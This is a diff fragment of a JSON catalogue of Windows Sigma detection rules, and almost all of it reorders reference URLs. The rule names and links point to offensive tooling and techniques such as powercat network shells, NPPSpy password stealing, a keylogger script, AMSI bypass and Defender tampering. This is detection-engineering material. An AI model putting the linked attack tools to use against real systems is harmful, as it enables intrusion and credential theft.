"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dot_net_etw_tamper.yml" ], "tags": [ @@ -19540,9 +19564,9 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", - "https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_internet_explorer.yml" ], "tags": [ @@ -19566,8 +19590,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" ], "tags": [ @@ -19601,8 +19625,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions", + "https://blogs.vmware.com/security/2022/11/batloader-the-evasive-downloader-malware.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_function_user.yml" ], "tags": [ @@ -19626,8 +19650,8 @@ "logsource.category": "registry_set", "logsource.product": "windows", "refs": [ - "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", "https://github.com/r00t-3xp10it/hacking-material-books/blob/43cb1e1932c16ff1f58b755bc9ab6b096046853f/obfuscation/simple_obfuscation.md#amsi-comreg-bypass", + "https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_amsi_com_hijack.yml" ], "tags": [ @@ -19653,8 +19677,8 @@ "refs": [ "https://persistence-info.github.io/Data/ifilters.html", "https://github.com/gtworek/PSBits/tree/master/IFilter", - "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", "https://twitter.com/0gtweet/status/1468548924600459267", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/IFilter/Dll.cpp#L281-L308", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_ifilter.yml" ], "tags": [ @@ -19812,9 +19836,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://securitydatasets.com/notebooks/small/windows/05_defense_evasion/SDWIN-201017061100.html", "https://twitter.com/dez_/status/986614411711442944", + "https://lolbas-project.github.io/lolbas/Binaries/Wmic/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wmic_remote_xsl_scripting_dlls.yml" ], "tags": [ @@ -19914,8 +19938,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/binderlabs/DirCreate2System", "https://github.com/sailay1996/awesome_windows_logical_bugs/blob/60cbb23a801f4c3195deac1cc46df27c225c3d07/dir_create2system.txt", + "https://github.com/binderlabs/DirCreate2System", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_comctl32.yml" ], "tags": [ @@ -19942,10 +19966,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://docs.microsoft.com/en-us/windows/win32/winrm/windows-remote-management-architecture", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_wsman_provider_image_load.yml" ], "tags": [ @@ -20020,8 +20044,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/am0nsec/status/1412232114980982787", "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", + "https://twitter.com/am0nsec/status/1412232114980982787", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" ], "tags": [ @@ -20347,12 +20371,12 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", - "https://github.com/Wh04m1001/SysmonEoP", - "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://decoded.avast.io/martinchlumecky/png-steganography/", "http://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html", + "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", + "https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/", + "https://clement.notin.org/blog/2020/09/12/CVE-2020-7315-McAfee-Agent-DLL-injection/", + "https://decoded.avast.io/martinchlumecky/png-steganography/", + "https://github.com/Wh04m1001/SysmonEoP", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_non_existent_dlls.yml" ], "tags": [ @@ -20467,8 +20491,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", "https://www.welivesecurity.com/2022/12/14/unmasking-mirrorface-operation-liberalface-targeting-japanese-political-entities/", + "http://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_jsschhlp.yml" ], "tags": [ @@ -20528,8 +20552,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" ], "tags": [ @@ -20555,8 +20579,8 @@ "refs": [ "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", "https://hijacklibs.net/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", + "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" ], "tags": [ @@ -20800,10 +20824,10 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/tyranid/DotNetToJScript", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://web.archive.org/web/20221026202428/https://gist.github.com/code-scrap/d7f152ffcdb3e0b02f7f394f5187f008", "https://thewover.github.io/Introducing-Donut/", + "https://github.com/tyranid/DotNetToJScript", + "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" ], "tags": [ @@ -20887,8 +20911,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/", + "https://blogs.blackberry.com/en/2022/12/mustang-panda-uses-the-russian-ukrainian-war-to-attack-europe-and-asia-pacific-targets", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_classicexplorer32.yml" ], "tags": [ @@ -21268,9 +21292,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://twitter.com/HunterPlaybook/status/1301207718355759107", - "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", + "https://www.mdsec.co.uk/2020/09/i-like-to-move-it-windows-lateral-movement-part-1-wmi-event-subscription/", + "https://twitter.com/HunterPlaybook/status/1301207718355759107", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_scrcons_imageload_wmi_scripteventconsumer.yml" ], "tags": [ @@ -21425,8 +21449,8 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/ly4k/SpoolFool", "https://github.com/hhlxf/PrintNightmare", + "https://github.com/ly4k/SpoolFool", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" ], "tags": [ @@ -21490,9 +21514,9 @@ "logsource.category": "image_load", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://docs.microsoft.com/en-us/windows/win32/api/wincred/nf-wincred-creduipromptforcredentialsa", "https://securitydatasets.com/notebooks/small/windows/06_credential_access/SDWIN-201020013208.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.002/T1056.002.md#atomic-test-2---powershell---prompt-user-for-password", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uipromptforcreds_dlls.yml" ], "tags": [ @@ -21660,8 +21684,8 @@ "logsource.product": "windows", "refs": [ "https://github.com/RiccardoAncarani/LiquidSnake", - "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/Neo23x0/signature-base/blob/615bf1f6bac3c1bdc417025c40c073e6c2771a76/yara/gen_susp_lnk_files.yar#L19", + "https://in.security/an-intro-into-abusing-and-identifying-wmi-event-subscriptions-for-persistence/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/wmi_event/sysmon_wmi_susp_scripting.yml" ], "tags": [ @@ -21695,8 +21719,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" ], "tags": [ @@ -21729,9 +21753,9 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/bohops/WSMan-WinRM", "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" ], "tags": [ @@ -21882,8 +21906,8 @@ "logsource.category": "No established category", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -21985,8 +22009,8 @@ "logsource.category": "ps_classic_start", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" ], "tags": [ @@ -22278,9 +22302,9 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", - "https://www.mdeditor.tw/pl/pgRt", "https://labs.sentinelone.com/top-tier-russian-organized-cybercrime-group-unveils-fileless-stealthy-powertrick-backdoor-for-high-value-targets/", + "https://www.mdeditor.tw/pl/pgRt", + "https://newtonpaul.com/analysing-fileless-malware-cobalt-strike-beacon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_bad_opsec_artifacts.yml" ], "tags": [ @@ -22313,8 +22337,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/OTRF/detection-hackathon-apt29/issues/16", + "https://threathunterplaybook.com/evals/apt29/detections/7.A.2_F4609F7E-C4DB-4327-91D4-59A58C962A02.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_clipboard.yml" ], "tags": [ @@ -22508,8 +22532,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://www.n00py.io/2022/03/manipulating-user-passwords-without-mimikatz/", + "https://github.com/MichaelGrafnetter/DSInternals/blob/7ba59c12ee9a1cb430d7dc186a3366842dd612c8/Documentation/PowerShell/Get-ADDBAccount.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_get_addbaccount.yml" ], "tags": [ @@ -22543,8 +22567,8 @@ "logsource.product": "windows", "refs": [ "https://nmap.org/ncat/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_powercat.yml" ], "tags": [ @@ -23059,8 +23083,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/reset-computermachinepassword?view=powershell-5.1", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_reset_computermachinepassword.yml" ], "tags": [ @@ -23084,8 +23108,8 @@ "logsource.category": "ps_module", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_module/posh_pm_susp_athremotefxvgpudisablementcommand.yml" ], "tags": [ @@ -23285,8 +23309,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://attack.mitre.org/datasources/DS0005/", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://attack.mitre.org/datasources/DS0005/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_gwmi.yml" ], "tags": [ @@ -23454,8 +23478,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1059.001/T1059.001.md#atomic-test-10---powershell-invoke-downloadcradle", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/new-pssession?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remote_session_creation.yml" ], "tags": [ @@ -23613,8 +23637,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://techgenix.com/malicious-powershell-scripts-evade-detection/", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1497.001/T1497.001.md", + "https://techgenix.com/malicious-powershell-scripts-evade-detection/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_detect_vm_env.yml" ], "tags": [ @@ -23717,10 +23741,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://powersploit.readthedocs.io/en/stable/Recon/README", - "https://thedfirreport.com/2020/10/08/ryuks-return", - "https://adsecurity.org/?p=2277", "https://github.com/PowerShellMafia/PowerSploit/tree/master/Recon", + "https://thedfirreport.com/2020/10/08/ryuks-return", + "https://powersploit.readthedocs.io/en/stable/Recon/README", + "https://adsecurity.org/?p=2277", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_powerview_malicious_commandlets.yml" ], "tags": [ @@ -23862,8 +23886,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.ietf.org/rfc/rfc2821.txt", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/send-mailmessage?view=powershell-7.2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_send_mailmessage.yml" ], @@ -23897,9 +23921,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://www.cisa.gov/uscert/sites/default/files/publications/aa22-320a_joint_csa_iranian_government-sponsored_apt_actors_compromise_federal%20network_deploy_crypto%20miner_credential_harvester.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_computer_discovery_get_adcomputer.yml" ], "tags": [ @@ -23924,8 +23948,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2", + "https://twitter.com/Alh4zr3d/status/1580925761996828672", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_using_set_service_to_hide_services.yml" ], "tags": [ @@ -24073,10 +24097,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "https://www.tutorialspoint.com/how-to-get-windows-firewall-profile-settings-using-powershell", "http://powershellhelp.space/commands/set-netfirewallrule-psv5.php", "https://www.elastic.co/guide/en/security/current/windows-firewall-disabled-via-powershell.html", + "https://docs.microsoft.com/en-us/powershell/module/netsecurity/set-netfirewallprofile?view=windowsserver2019-ps", "http://woshub.com/manage-windows-firewall-powershell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_windows_firewall_profile_disabled.yml" ], @@ -24110,8 +24134,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.accountmanagement?view=dotnet-plat-ext-6.0", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1136.002/T1136.002.md#atomic-test-3---create-a-new-domain-account-using-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_directoryservices_accountmanagement.yml" ], "tags": [ @@ -24177,8 +24201,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1056.001/src/Get-Keystrokes.ps1", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_keylogging.yml" ], "tags": [ @@ -24235,10 +24259,10 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://youtu.be/5mqid-7zp8k?t=2481", "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", - "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://youtu.be/5mqid-7zp8k?t=2481", + "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_mailboxexport_share.yml" ], "tags": [ @@ -24351,8 +24375,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1573/T1573.md#atomic-test-1---openssl-c2", + "https://medium.com/walmartglobaltech/openssl-server-reverse-shell-from-windows-client-aee2dbfa0926", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_ssl_keyword.yml" ], "tags": [ @@ -24507,9 +24531,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://adsecurity.org/?p=2604", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_execution_policies?view=powershell-7.1", + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.security/set-executionpolicy?view=powershell-7.1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_set_policies_to_unsecure_level.yml" ], "tags": [ @@ -24566,8 +24590,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/unblock-file?view=powershell-7.2", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.005/T1553.005.md#atomic-test-3---remove-the-zoneidentifier-alternate-data-stream", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_unblock_file.yml" ], "tags": [ @@ -24965,8 +24989,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/Remove-Item?view=powershell-5.1&viewFallbackFrom=powershell-7", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.004/T1070.004.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_remove_item_path.yml" ], "tags": [ @@ -25226,8 +25250,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319", + "https://github.com/sense-of-security/ADRecon/blob/11881a24e9c8b207f31b56846809ce1fb189bcc9/ADRecon.ps1", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_adrecon_execution.yml" ], "tags": [ @@ -25261,8 +25285,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://docs.microsoft.com/en-us/powershell/module/grouppolicy/get-gpo?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1615/T1615.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_susp_get_gpo.yml" ], "tags": [ @@ -25423,8 +25447,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://docs.microsoft.com/en-us/powershell/module/nettcpip/test-netconnection?view=windowsserver2022-ps", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1571/T1571.md#atomic-test-1---testing-usage-of-uncommonly-used-port-with-powershell", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_test_netconnection.yml" ], "tags": [ @@ -25480,9 +25504,9 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://bidouillesecurity.com/disable-windows-defender-in-powershell/", - "https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_tamper_defender.yml" ], "tags": [ @@ -25810,8 +25834,8 @@ "logsource.category": "ps_script", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-4---powershell-cmdlet-scheduled-task", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.005/T1053.005.md#atomic-test-6---wmi-invoke-cimmethod-scheduled-task", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_script/posh_ps_cmdlet_scheduled_task.yml" ], "tags": [ @@ -25911,8 +25935,8 @@ 